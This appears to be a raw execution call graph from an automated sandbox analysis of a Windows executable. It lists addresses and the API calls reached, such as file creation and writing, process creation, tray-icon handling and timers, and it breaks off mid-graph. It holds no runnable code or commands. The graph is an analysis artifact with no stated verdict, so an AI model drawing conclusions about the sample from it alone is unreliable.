                                                                                                                    execution_graph 94771 7ff7bb7f5f13 94772 7ff7bb7f5f1c memcpy_s 94771->94772 94774 7ff7bb8414b6 94772->94774 94777 7ff7bb7f5f74 94772->94777 94780 7ff7bb7f5abd memcpy_s Concurrency::wait 94772->94780 94782 7ff7bb7ed4cc 94772->94782 94806 7ff7bb804c68 94772->94806 94812 7ff7bb80364c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94774->94812 94776 7ff7bb8414c5 94813 7ff7bb7ee0a8 94776->94813 94801 7ff7bb7eb960 94777->94801 94783 7ff7bb7ed50b 94782->94783 94796 7ff7bb7ed4f2 94782->94796 94784 7ff7bb7ed513 94783->94784 94785 7ff7bb7ed53e 94783->94785 94817 7ff7bb80956c 31 API calls 94784->94817 94787 7ff7bb7ed550 94785->94787 94793 7ff7bb839bbc 94785->94793 94795 7ff7bb839cc4 94785->94795 94823 7ff7bb804834 46 API calls 94787->94823 94789 7ff7bb7ed522 94818 7ff7bb7eec00 94789->94818 94791 7ff7bb839cdc 94797 7ff7bb804c68 4 API calls 94793->94797 94798 7ff7bb839c3e Concurrency::wait wcscpy 94793->94798 94825 7ff7bb809538 31 API calls 94795->94825 94796->94772 94799 7ff7bb839c0a 94797->94799 94824 7ff7bb804834 46 API calls 94798->94824 94800 7ff7bb7eec00 4 API calls 94799->94800 94800->94798 94802 7ff7bb7eb981 94801->94802 94805 7ff7bb7eb976 memcpy_s 94801->94805 94803 7ff7bb804c68 4 API calls 94802->94803 94804 7ff7bb82ef2a 94802->94804 94803->94805 94805->94780 94808 7ff7bb804c2c 94806->94808 94807 7ff7bb804c50 94807->94772 94808->94806 94808->94807 94826 7ff7bb80925c EnterCriticalSection LeaveCriticalSection abort 94808->94826 94827 7ff7bb805600 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 94808->94827 94828 7ff7bb805620 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 94808->94828 94812->94776 94814 7ff7bb7ee0b6 94813->94814 94815 7ff7bb7ee0bb 94813->94815 94829 7ff7bb7ef0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 94814->94829 94815->94780 94817->94789 94819 7ff7bb7eec1d 94818->94819 94820 7ff7bb83a5a2 94819->94820 94821 7ff7bb804c68 4 API calls 94819->94821 94822 7ff7bb7eec55 memcpy_s 94821->94822 94822->94796 94823->94789 94824->94795 94825->94791 94826->94808 94828->94808 94829->94815 94830 7ff7bb7f47e1 94831 7ff7bb7f4d57 94830->94831 94835 7ff7bb7f47f2 94830->94835 94895 7ff7bb7eee20 5 API calls Concurrency::wait 94831->94895 94833 7ff7bb7f4d66 94896 7ff7bb7eee20 5 API calls Concurrency::wait 94833->94896 94835->94833 94836 7ff7bb7f4862 94835->94836 94837 7ff7bb7f4df3 94835->94837 94858 7ff7bb7f3c80 94836->94858 94860 7ff7bb7f66c0 94836->94860 94897 7ff7bb860978 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94837->94897 94840 7ff7bb8405be 94899 7ff7bb8634e4 77 API calls 3 library calls 94840->94899 94842 7ff7bb8405d1 94844 7ff7bb7f4ac0 94845 7ff7bb7f4fe7 94849 7ff7bb7ee0a8 4 API calls 94845->94849 94846 7ff7bb8050b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 94846->94858 94847 7ff7bb7ee0a8 4 API calls 94853 7ff7bb7f3dde 94847->94853 94848 7ff7bb83fefe 94852 7ff7bb7ee0a8 4 API calls 94848->94852 94849->94853 94850 7ff7bb7ee0a8 4 API calls 94850->94858 94851 7ff7bb7f4a8f 94851->94844 94851->94848 94854 7ff7bb7f4aa9 94851->94854 94852->94844 94854->94844 94854->94847 94856 7ff7bb7e9640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94856->94858 94857 7ff7bb805114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94857->94858 94858->94840 94858->94845 94858->94846 94858->94850 94858->94851 94858->94853 94858->94854 94858->94856 94858->94857 94859 7ff7bb804f0c 34 API calls __scrt_initialize_thread_safe_statics 94858->94859 94894 7ff7bb7f5360 300 API calls Concurrency::wait 94858->94894 94898 7ff7bb8634e4 77 API calls 3 library calls 94858->94898 94859->94858 94886 7ff7bb7f673b memcpy_s Concurrency::wait 94860->94886 94862 7ff7bb841fac 94864 7ff7bb841fbe 94862->94864 95045 7ff7bb87ab30 300 API calls Concurrency::wait 94862->95045 94863 7ff7bb7f6d40 9 API calls 94863->94886 94864->94858 94866 7ff7bb7eec00 4 API calls 94866->94886 94867 7ff7bb7f6c0f 94868 7ff7bb841fc9 94867->94868 94869 7ff7bb7f6c3d 94867->94869 95046 7ff7bb8634e4 77 API calls 3 library calls 94868->95046 95042 7ff7bb7eee20 5 API calls Concurrency::wait 94869->95042 94873 7ff7bb7f6c4a 95043 7ff7bb801fcc 300 API calls 94873->95043 94876 7ff7bb804c68 4 API calls 94876->94886 94877 7ff7bb8420c1 94885 7ff7bb7f6b15 94877->94885 95049 7ff7bb8634e4 77 API calls 3 library calls 94877->95049 94878 7ff7bb7f6c78 95044 7ff7bb7fe8f4 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94878->95044 94882 7ff7bb842032 95047 7ff7bb8634e4 77 API calls 3 library calls 94882->95047 94884 7ff7bb7ee0a8 4 API calls 94884->94886 94885->94858 94886->94862 94886->94863 94886->94866 94886->94867 94886->94868 94886->94873 94886->94876 94886->94877 94886->94878 94886->94882 94886->94884 94886->94885 94900 7ff7bb8663dc 94886->94900 94905 7ff7bb865b80 94886->94905 94911 7ff7bb868e98 94886->94911 94944 7ff7bb868ea0 94886->94944 94977 7ff7bb867e48 94886->94977 95011 7ff7bb87f160 94886->95011 95016 7ff7bb87f0ac 94886->95016 95019 7ff7bb7f3c20 94886->95019 95040 7ff7bb805114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 94886->95040 95041 7ff7bb8050b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 94886->95041 95048 7ff7bb878d98 49 API calls Concurrency::wait 94886->95048 94894->94858 94895->94833 94896->94837 94897->94858 94898->94858 94899->94842 94901 7ff7bb7ed4cc 48 API calls 94900->94901 94902 7ff7bb8663f8 94901->94902 95050 7ff7bb85bdec 94902->95050 94904 7ff7bb866404 94904->94886 94906 7ff7bb865ba5 94905->94906 94907 7ff7bb865ba9 94906->94907 94908 7ff7bb865be5 FindClose 94906->94908 94909 7ff7bb865bd5 94906->94909 94907->94886 94908->94907 94909->94907 95058 7ff7bb7e7ab8 94909->95058 94912 7ff7bb86a680 94911->94912 94918 7ff7bb86a71a 94912->94918 95087 7ff7bb7e834c 94912->95087 94915 7ff7bb7ed4cc 48 API calls 94917 7ff7bb86a6d0 94915->94917 94916 7ff7bb86a7fd 95125 7ff7bb861864 6 API calls 94916->95125 95096 7ff7bb7e6838 94917->95096 94918->94916 94919 7ff7bb86a6f3 94918->94919 94924 7ff7bb86a770 94918->94924 94919->94886 94922 7ff7bb86a805 95126 7ff7bb85b334 94922->95126 94926 7ff7bb7ed4cc 48 API calls 94924->94926 94925 7ff7bb86a6e6 94925->94919 94928 7ff7bb7e7ab8 CloseHandle 94925->94928 94932 7ff7bb86a778 94926->94932 94928->94919 94929 7ff7bb86a7ee 95069 7ff7bb85b3a8 94929->95069 94930 7ff7bb86a7a7 95112 7ff7bb7e98e8 94930->95112 94932->94929 94932->94930 94934 7ff7bb86a7b5 94936 7ff7bb7ee0a8 4 API calls 94934->94936 94935 7ff7bb7e8314 CloseHandle 94937 7ff7bb86a85c 94935->94937 94938 7ff7bb86a7c2 94936->94938 94937->94919 94940 7ff7bb7e7ab8 CloseHandle 94937->94940 95115 7ff7bb7e71f8 94938->95115 94940->94919 94941 7ff7bb86a7d3 94942 7ff7bb85b3a8 12 API calls 94941->94942 94943 7ff7bb86a7e0 Concurrency::wait 94942->94943 94943->94919 94943->94935 94945 7ff7bb86a680 94944->94945 94946 7ff7bb7e834c 5 API calls 94945->94946 94952 7ff7bb86a71a 94945->94952 94948 7ff7bb86a6be 94946->94948 94947 7ff7bb86a6f3 94947->94886 94949 7ff7bb7ed4cc 48 API calls 94948->94949 94951 7ff7bb86a6d0 94949->94951 94950 7ff7bb86a7fd 95148 7ff7bb861864 6 API calls 94950->95148 94954 7ff7bb7e6838 16 API calls 94951->94954 94952->94947 94952->94950 94957 7ff7bb86a770 94952->94957 94956 7ff7bb86a6e2 94954->94956 94955 7ff7bb86a805 94960 7ff7bb85b334 4 API calls 94955->94960 94956->94952 94958 7ff7bb86a6e6 94956->94958 94959 7ff7bb7ed4cc 48 API calls 94957->94959 94958->94947 94962 7ff7bb7e7ab8 CloseHandle 94958->94962 94964 7ff7bb86a778 94959->94964 94961 7ff7bb86a7e0 Concurrency::wait 94960->94961 94961->94947 94969 7ff7bb7e8314 CloseHandle 94961->94969 94962->94947 94963 7ff7bb86a7ee 94966 7ff7bb85b3a8 12 API calls 94963->94966 94964->94963 94965 7ff7bb86a7a7 94964->94965 94967 7ff7bb7e98e8 4 API calls 94965->94967 94966->94961 94968 7ff7bb86a7b5 94967->94968 94970 7ff7bb7ee0a8 4 API calls 94968->94970 94971 7ff7bb86a85c 94969->94971 94972 7ff7bb86a7c2 94970->94972 94971->94947 94974 7ff7bb7e7ab8 CloseHandle 94971->94974 94973 7ff7bb7e71f8 4 API calls 94972->94973 94975 7ff7bb86a7d3 94973->94975 94974->94947 94976 7ff7bb85b3a8 12 API calls 94975->94976 94976->94961 94978 7ff7bb867e79 94977->94978 94979 7ff7bb7e9640 4 API calls 94978->94979 94980 7ff7bb867f55 Concurrency::wait 94978->94980 94981 7ff7bb867ea6 94979->94981 94982 7ff7bb7e834c 5 API calls 94980->94982 95005 7ff7bb867fe5 94980->95005 94983 7ff7bb7e9640 4 API calls 94981->94983 94984 7ff7bb867f99 94982->94984 94986 7ff7bb867eaf 94983->94986 94985 7ff7bb7ed4cc 48 API calls 94984->94985 94987 7ff7bb867fab 94985->94987 94988 7ff7bb7ed4cc 48 API calls 94986->94988 94989 7ff7bb7e6838 16 API calls 94987->94989 94990 7ff7bb867ebe 94988->94990 94992 7ff7bb867fba 94989->94992 95149 7ff7bb7e74ac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94990->95149 94994 7ff7bb867fbe GetLastError 94992->94994 94998 7ff7bb867ff5 94992->94998 94993 7ff7bb867ed8 95150 7ff7bb7e7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 94993->95150 94996 7ff7bb867fd8 94994->94996 95001 7ff7bb7e7ab8 CloseHandle 94996->95001 94996->95005 94997 7ff7bb867f07 94997->94980 95151 7ff7bb85bdd4 lstrlenW GetFileAttributesW FindFirstFileW FindClose 94997->95151 94999 7ff7bb7e9640 4 API calls 94998->94999 95002 7ff7bb868035 94999->95002 95001->95005 95002->95005 95153 7ff7bb850d38 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95002->95153 95003 7ff7bb867f17 95003->94980 95004 7ff7bb867f1b 95003->95004 95007 7ff7bb7eec00 4 API calls 95004->95007 95005->94886 95008 7ff7bb867f28 95007->95008 95152 7ff7bb85bab8 8 API calls Concurrency::wait 95008->95152 95010 7ff7bb867f31 Concurrency::wait 95010->94980 95154 7ff7bb87f630 95011->95154 95013 7ff7bb87f1cd 95013->94886 95014 7ff7bb87f182 95014->95013 95222 7ff7bb7eee20 5 API calls Concurrency::wait 95014->95222 95017 7ff7bb87f630 164 API calls 95016->95017 95018 7ff7bb87f0c2 95017->95018 95018->94886 95028 7ff7bb7f3c80 95019->95028 95020 7ff7bb805114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95020->95028 95021 7ff7bb8405be 95253 7ff7bb8634e4 77 API calls 3 library calls 95021->95253 95023 7ff7bb8405d1 95023->94886 95024 7ff7bb7f4aa9 95026 7ff7bb7f4ac0 95024->95026 95030 7ff7bb7ee0a8 4 API calls 95024->95030 95026->94886 95027 7ff7bb7f4fe7 95032 7ff7bb7ee0a8 4 API calls 95027->95032 95028->95020 95028->95021 95028->95024 95028->95027 95029 7ff7bb7f3dde 95028->95029 95033 7ff7bb7ee0a8 4 API calls 95028->95033 95034 7ff7bb7f4a8f 95028->95034 95037 7ff7bb804f0c 34 API calls __scrt_initialize_thread_safe_statics 95028->95037 95038 7ff7bb7e9640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95028->95038 95039 7ff7bb8050b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 95028->95039 95251 7ff7bb7f5360 300 API calls Concurrency::wait 95028->95251 95252 7ff7bb8634e4 77 API calls 3 library calls 95028->95252 95029->94886 95030->95029 95031 7ff7bb83fefe 95035 7ff7bb7ee0a8 4 API calls 95031->95035 95032->95029 95033->95028 95034->95024 95034->95026 95034->95031 95035->95026 95037->95028 95038->95028 95039->95028 95042->94873 95043->94878 95044->94878 95045->94864 95046->94885 95047->94885 95048->94886 95049->94885 95053 7ff7bb85c7c0 lstrlenW 95050->95053 95054 7ff7bb85bdf5 95053->95054 95055 7ff7bb85c7dd GetFileAttributesW 95053->95055 95054->94904 95055->95054 95056 7ff7bb85c7eb FindFirstFileW 95055->95056 95056->95054 95057 7ff7bb85c7ff FindClose 95056->95057 95057->95054 95061 7ff7bb7e82e4 95058->95061 95066 7ff7bb7e8314 95061->95066 95063 7ff7bb7e82f2 Concurrency::wait 95064 7ff7bb7e8314 CloseHandle 95063->95064 95065 7ff7bb7e8303 95064->95065 95067 7ff7bb7e833d CloseHandle 95066->95067 95068 7ff7bb7e832a 95066->95068 95067->95068 95068->95063 95070 7ff7bb85b3c8 95069->95070 95071 7ff7bb85b42a 95069->95071 95072 7ff7bb85b41e 95070->95072 95073 7ff7bb85b3d0 95070->95073 95074 7ff7bb85b334 4 API calls 95071->95074 95136 7ff7bb85b458 8 API calls 95072->95136 95076 7ff7bb85b3dd 95073->95076 95077 7ff7bb85b3f1 95073->95077 95086 7ff7bb85b410 Concurrency::wait 95074->95086 95132 7ff7bb7ea368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95076->95132 95134 7ff7bb7ea368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95077->95134 95080 7ff7bb85b3f6 95135 7ff7bb85b270 6 API calls 95080->95135 95081 7ff7bb85b3e2 95133 7ff7bb804120 6 API calls 95081->95133 95084 7ff7bb85b3ef 95129 7ff7bb85b384 95084->95129 95086->94943 95088 7ff7bb804c68 4 API calls 95087->95088 95089 7ff7bb7e8363 95088->95089 95090 7ff7bb7e8314 CloseHandle 95089->95090 95091 7ff7bb7e836f 95090->95091 95137 7ff7bb7e9640 95091->95137 95093 7ff7bb7e8378 95094 7ff7bb7e8314 CloseHandle 95093->95094 95095 7ff7bb7e8380 95094->95095 95095->94915 95097 7ff7bb7e8314 CloseHandle 95096->95097 95098 7ff7bb7e685a 95097->95098 95099 7ff7bb82caa8 95098->95099 95100 7ff7bb7e687d CreateFileW 95098->95100 95101 7ff7bb82caae CreateFileW 95099->95101 95109 7ff7bb7e68d9 95099->95109 95103 7ff7bb7e68ab 95100->95103 95102 7ff7bb82cae6 95101->95102 95101->95103 95142 7ff7bb7e6a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95102->95142 95104 7ff7bb7e68e4 95103->95104 95140 7ff7bb7e68f4 9 API calls 95103->95140 95104->94918 95104->94925 95106 7ff7bb82caf3 95106->95103 95108 7ff7bb7e68c1 95108->95109 95141 7ff7bb7e6a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95108->95141 95109->95104 95111 7ff7bb85b334 4 API calls 95109->95111 95111->95104 95113 7ff7bb804c68 4 API calls 95112->95113 95114 7ff7bb7e9918 95113->95114 95114->94934 95116 7ff7bb7e721c 95115->95116 95117 7ff7bb82cd0c 95115->95117 95118 7ff7bb7e7274 95116->95118 95121 7ff7bb82cd66 memcpy_s 95116->95121 95122 7ff7bb804c68 4 API calls 95117->95122 95119 7ff7bb7eb960 4 API calls 95118->95119 95120 7ff7bb7e7283 memcpy_s 95119->95120 95120->94941 95123 7ff7bb804c68 4 API calls 95121->95123 95122->95121 95124 7ff7bb82cdda memcpy_s 95123->95124 95125->94922 95143 7ff7bb85b188 95126->95143 95130 7ff7bb85b334 4 API calls 95129->95130 95131 7ff7bb85b399 95130->95131 95131->95086 95132->95081 95133->95084 95134->95080 95135->95084 95136->95086 95138 7ff7bb804c68 4 API calls 95137->95138 95139 7ff7bb7e9663 95138->95139 95139->95093 95140->95108 95141->95109 95142->95106 95144 7ff7bb85b19c WriteFile 95143->95144 95145 7ff7bb85b193 95143->95145 95144->94943 95147 7ff7bb85b208 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95145->95147 95147->95144 95148->94955 95149->94993 95150->94997 95151->95003 95152->95010 95153->95005 95157 7ff7bb87f671 __scrt_fastfail 95154->95157 95155 7ff7bb7ed4cc 48 API calls 95156 7ff7bb87f74d 95155->95156 95223 7ff7bb7ee330 95156->95223 95157->95155 95159 7ff7bb87f759 95160 7ff7bb87f762 95159->95160 95161 7ff7bb87f840 95159->95161 95163 7ff7bb7ed4cc 48 API calls 95160->95163 95162 7ff7bb87f87d GetCurrentDirectoryW 95161->95162 95164 7ff7bb7ed4cc 48 API calls 95161->95164 95165 7ff7bb804c68 4 API calls 95162->95165 95166 7ff7bb87f777 95163->95166 95167 7ff7bb87f85c 95164->95167 95168 7ff7bb87f8a7 GetCurrentDirectoryW 95165->95168 95169 7ff7bb7ee330 4 API calls 95166->95169 95170 7ff7bb7ee330 4 API calls 95167->95170 95171 7ff7bb87f8b5 95168->95171 95172 7ff7bb87f783 95169->95172 95173 7ff7bb87f868 95170->95173 95174 7ff7bb87f8f0 95171->95174 95236 7ff7bb7ff688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95171->95236 95175 7ff7bb7ed4cc 48 API calls 95172->95175 95173->95162 95173->95174 95182 7ff7bb87f905 95174->95182 95185 7ff7bb87f901 95174->95185 95177 7ff7bb87f798 95175->95177 95179 7ff7bb7ee330 4 API calls 95177->95179 95178 7ff7bb87f8d0 95237 7ff7bb7ff688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95178->95237 95181 7ff7bb87f7a4 95179->95181 95184 7ff7bb7ed4cc 48 API calls 95181->95184 95239 7ff7bb85fddc 8 API calls 95182->95239 95183 7ff7bb87f8e0 95238 7ff7bb7ff688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95183->95238 95190 7ff7bb87f7b9 95184->95190 95187 7ff7bb87f972 95185->95187 95188 7ff7bb87fa0f CreateProcessW 95185->95188 95242 7ff7bb84d1f8 99 API calls 95187->95242 95219 7ff7bb87f9b4 95188->95219 95193 7ff7bb7ee330 4 API calls 95190->95193 95191 7ff7bb87f90e 95240 7ff7bb85fca8 8 API calls 95191->95240 95195 7ff7bb87f7c5 95193->95195 95197 7ff7bb87f806 GetSystemDirectoryW 95195->95197 95199 7ff7bb7ed4cc 48 API calls 95195->95199 95196 7ff7bb87f926 95241 7ff7bb85fafc 8 API calls ~SyncLockT 95196->95241 95201 7ff7bb804c68 4 API calls 95197->95201 95203 7ff7bb87f7e1 95199->95203 95200 7ff7bb87f94f 95200->95185 95202 7ff7bb87f830 GetSystemDirectoryW 95201->95202 95202->95171 95205 7ff7bb7ee330 4 API calls 95203->95205 95204 7ff7bb87fabe CloseHandle 95206 7ff7bb87facc 95204->95206 95207 7ff7bb87faf5 95204->95207 95208 7ff7bb87f7ed 95205->95208 95243 7ff7bb85f7dc 95206->95243 95210 7ff7bb87fafe 95207->95210 95214 7ff7bb87fb26 CloseHandle 95207->95214 95208->95171 95208->95197 95218 7ff7bb87faa3 95210->95218 95212 7ff7bb87fa64 95215 7ff7bb87fa84 GetLastError 95212->95215 95214->95218 95215->95218 95227 7ff7bb85f51c 95218->95227 95219->95204 95219->95212 95222->95013 95224 7ff7bb7ee342 95223->95224 95225 7ff7bb804c68 4 API calls 95224->95225 95226 7ff7bb7ee361 wcscpy 95225->95226 95226->95159 95228 7ff7bb85f7dc CloseHandle 95227->95228 95229 7ff7bb85f52a 95228->95229 95248 7ff7bb85f7b8 95229->95248 95232 7ff7bb85f7b8 ~SyncLockT CloseHandle 95233 7ff7bb85f53c 95232->95233 95234 7ff7bb85f7b8 ~SyncLockT CloseHandle 95233->95234 95235 7ff7bb85f545 95234->95235 95235->95014 95236->95178 95237->95183 95238->95174 95239->95191 95240->95196 95241->95200 95242->95219 95244 7ff7bb85f7b8 ~SyncLockT CloseHandle 95243->95244 95245 7ff7bb85f7ee 95244->95245 95246 7ff7bb85f7b8 ~SyncLockT CloseHandle 95245->95246 95247 7ff7bb85f7f7 95246->95247 95249 7ff7bb85f7c9 CloseHandle 95248->95249 95250 7ff7bb85f533 95248->95250 95249->95250 95250->95232 95251->95028 95252->95028 95253->95023 95254 7ff7bb81c51c 95255 7ff7bb81c567 95254->95255 95256 7ff7bb81c52b abort 95254->95256 95262 7ff7bb8155d4 15 API calls abort 95255->95262 95256->95255 95258 7ff7bb81c54e HeapAlloc 95256->95258 95261 7ff7bb80925c EnterCriticalSection LeaveCriticalSection abort 95256->95261 95258->95256 95259 7ff7bb81c565 95258->95259 95261->95256 95262->95259 95263 7ff7bb808fac 95264 7ff7bb80901c 95263->95264 95265 7ff7bb808fd2 GetModuleHandleW 95263->95265 95280 7ff7bb81b9bc EnterCriticalSection 95264->95280 95265->95264 95269 7ff7bb808fdf 95265->95269 95267 7ff7bb81ba10 _isindst LeaveCriticalSection 95268 7ff7bb8090f0 95267->95268 95271 7ff7bb8090fc 95268->95271 95272 7ff7bb809118 11 API calls 95268->95272 95269->95264 95281 7ff7bb809164 GetModuleHandleExW 95269->95281 95270 7ff7bb8090b8 95276 7ff7bb81ada4 108 API calls 95270->95276 95272->95271 95273 7ff7bb81aa8c 30 API calls 95278 7ff7bb8090a0 95273->95278 95275 7ff7bb81ada4 108 API calls 95275->95270 95279 7ff7bb8090cb 95276->95279 95277 7ff7bb809026 95277->95273 95277->95278 95277->95279 95278->95270 95278->95275 95279->95267 95282 7ff7bb80918e GetProcAddress 95281->95282 95283 7ff7bb8091b5 95281->95283 95282->95283 95286 7ff7bb8091a8 95282->95286 95284 7ff7bb8091bf FreeLibrary 95283->95284 95285 7ff7bb8091c5 95283->95285 95284->95285 95285->95264 95286->95283 95287 7ff7bb7e5dec 95288 7ff7bb7e5df4 95287->95288 95289 7ff7bb7e5e98 95288->95289 95290 7ff7bb7e5e28 95288->95290 95316 7ff7bb7e5e96 95288->95316 95294 7ff7bb82c229 95289->95294 95295 7ff7bb7e5e9e 95289->95295 95291 7ff7bb7e5e35 95290->95291 95292 7ff7bb7e5f21 PostQuitMessage 95290->95292 95296 7ff7bb7e5e40 95291->95296 95297 7ff7bb82c2af 95291->95297 95299 7ff7bb7e5e7c 95292->95299 95293 7ff7bb7e5e6b DefWindowProcW 95293->95299 95343 7ff7bb7fede4 8 API calls 95294->95343 95300 7ff7bb7e5ea5 95295->95300 95301 7ff7bb7e5ecc SetTimer RegisterWindowMessageW 95295->95301 95302 7ff7bb7e5f2b 95296->95302 95303 7ff7bb7e5e49 95296->95303 95355 7ff7bb85a40c 16 API calls __scrt_fastfail 95297->95355 95307 7ff7bb82c1b8 95300->95307 95308 7ff7bb7e5eae KillTimer 95300->95308 95301->95299 95304 7ff7bb7e5efc CreatePopupMenu 95301->95304 95333 7ff7bb804610 95302->95333 95303->95316 95317 7ff7bb7e5e5f 95303->95317 95318 7ff7bb7e5f0b 95303->95318 95304->95299 95306 7ff7bb82c255 95344 7ff7bb802c44 47 API calls Concurrency::wait 95306->95344 95313 7ff7bb82c1f7 MoveWindow 95307->95313 95314 7ff7bb82c1bd 95307->95314 95329 7ff7bb7e5d88 95308->95329 95310 7ff7bb82c2c3 95310->95293 95310->95299 95313->95299 95319 7ff7bb82c1c2 95314->95319 95320 7ff7bb82c1e4 SetFocus 95314->95320 95316->95293 95317->95293 95326 7ff7bb7e5d88 Shell_NotifyIconW 95317->95326 95341 7ff7bb7e5f3c 26 API calls __scrt_fastfail 95318->95341 95319->95317 95321 7ff7bb82c1cb 95319->95321 95320->95299 95342 7ff7bb7fede4 8 API calls 95321->95342 95325 7ff7bb7e5f1f 95325->95299 95327 7ff7bb82c280 95326->95327 95345 7ff7bb7e6258 95327->95345 95330 7ff7bb7e5de4 95329->95330 95331 7ff7bb7e5d99 __scrt_fastfail 95329->95331 95340 7ff7bb7e7098 DeleteObject DestroyWindow Concurrency::wait 95330->95340 95332 7ff7bb7e5db8 Shell_NotifyIconW 95331->95332 95332->95330 95334 7ff7bb8046db 95333->95334 95335 7ff7bb80461a __scrt_fastfail 95333->95335 95334->95299 95356 7ff7bb7e72c8 95335->95356 95337 7ff7bb8046a2 KillTimer SetTimer 95337->95334 95338 7ff7bb804660 95338->95337 95339 7ff7bb84aaa1 Shell_NotifyIconW 95338->95339 95339->95337 95340->95299 95341->95325 95342->95299 95343->95306 95344->95317 95346 7ff7bb7e6287 __scrt_fastfail 95345->95346 95400 7ff7bb7e61c4 95346->95400 95350 7ff7bb7e634e Shell_NotifyIconW 95352 7ff7bb7e72c8 6 API calls 95350->95352 95351 7ff7bb82c644 Shell_NotifyIconW 95354 7ff7bb7e6365 95352->95354 95353 7ff7bb7e632d 95353->95350 95353->95351 95354->95316 95355->95310 95357 7ff7bb7e72f4 95356->95357 95358 7ff7bb7e73bc Concurrency::wait 95356->95358 95359 7ff7bb7e98e8 4 API calls 95357->95359 95358->95338 95360 7ff7bb7e7303 95359->95360 95361 7ff7bb7e7310 95360->95361 95362 7ff7bb82cdfc LoadStringW 95360->95362 95378 7ff7bb7e7cf4 95361->95378 95364 7ff7bb82ce1e 95362->95364 95366 7ff7bb7ee0a8 4 API calls 95364->95366 95365 7ff7bb7e7324 95367 7ff7bb7e7336 95365->95367 95368 7ff7bb82ce30 95365->95368 95374 7ff7bb7e734f __scrt_fastfail wcscpy 95366->95374 95367->95364 95369 7ff7bb7e7343 95367->95369 95389 7ff7bb7e7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95368->95389 95388 7ff7bb7e7c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 95369->95388 95372 7ff7bb82ce3c 95373 7ff7bb7e71f8 4 API calls 95372->95373 95372->95374 95375 7ff7bb82ce63 95373->95375 95376 7ff7bb7e73a3 Shell_NotifyIconW 95374->95376 95377 7ff7bb7e71f8 4 API calls 95375->95377 95376->95358 95377->95374 95379 7ff7bb82d2c8 95378->95379 95380 7ff7bb7e7d0d 95378->95380 95391 7ff7bb7edda4 95379->95391 95383 7ff7bb7e7d24 95380->95383 95386 7ff7bb7e7d51 95380->95386 95382 7ff7bb82d2d3 95390 7ff7bb7e7e4c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95383->95390 95385 7ff7bb7e7d2f memcpy_s 95385->95365 95386->95382 95387 7ff7bb804c68 4 API calls 95386->95387 95387->95385 95388->95374 95389->95372 95390->95385 95392 7ff7bb7edda9 95391->95392 95394 7ff7bb7eddc7 memcpy_s 95391->95394 95392->95394 95395 7ff7bb7ea7c0 95392->95395 95394->95382 95396 7ff7bb7ea7ed 95395->95396 95399 7ff7bb7ea7dd memcpy_s 95395->95399 95397 7ff7bb82e7da 95396->95397 95398 7ff7bb804c68 4 API calls 95396->95398 95398->95399 95399->95394 95401 7ff7bb82c5f8 95400->95401 95402 7ff7bb7e61e0 95400->95402 95401->95402 95403 7ff7bb82c602 DestroyIcon 95401->95403 95402->95353 95404 7ff7bb85ad94 39 API calls wcsftime 95402->95404 95403->95402 95404->95353 95405 7ff7bb83b221 95406 7ff7bb83b22a 95405->95406 95413 7ff7bb7f0378 95405->95413 95428 7ff7bb8547bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95406->95428 95408 7ff7bb83b241 95429 7ff7bb854708 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95408->95429 95410 7ff7bb83b264 95411 7ff7bb7f3c20 300 API calls 95410->95411 95412 7ff7bb83b292 95411->95412 95419 7ff7bb7f0405 95412->95419 95430 7ff7bb878d98 49 API calls Concurrency::wait 95412->95430 95422 7ff7bb7ef7b8 95413->95422 95416 7ff7bb83b2d9 Concurrency::wait 95416->95413 95431 7ff7bb8547bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95416->95431 95417 7ff7bb7f070a 95419->95417 95421 7ff7bb7ee0a8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95419->95421 95432 7ff7bb7eee20 5 API calls Concurrency::wait 95419->95432 95421->95419 95427 7ff7bb7ef7d5 95422->95427 95423 7ff7bb7ef7de 95423->95419 95424 7ff7bb7e9640 4 API calls 95424->95427 95425 7ff7bb7ee0a8 4 API calls 95425->95427 95426 7ff7bb7ef7b8 4 API calls 95426->95427 95427->95423 95427->95424 95427->95425 95427->95426 95428->95408 95429->95410 95430->95416 95431->95416 95432->95419 95433 7ff7bb7f447b 95438 7ff7bb7f58d0 95433->95438 95435 7ff7bb7f448a 95468 7ff7bb8634e4 77 API calls 3 library calls 95435->95468 95437 7ff7bb840550 95439 7ff7bb7f58fc 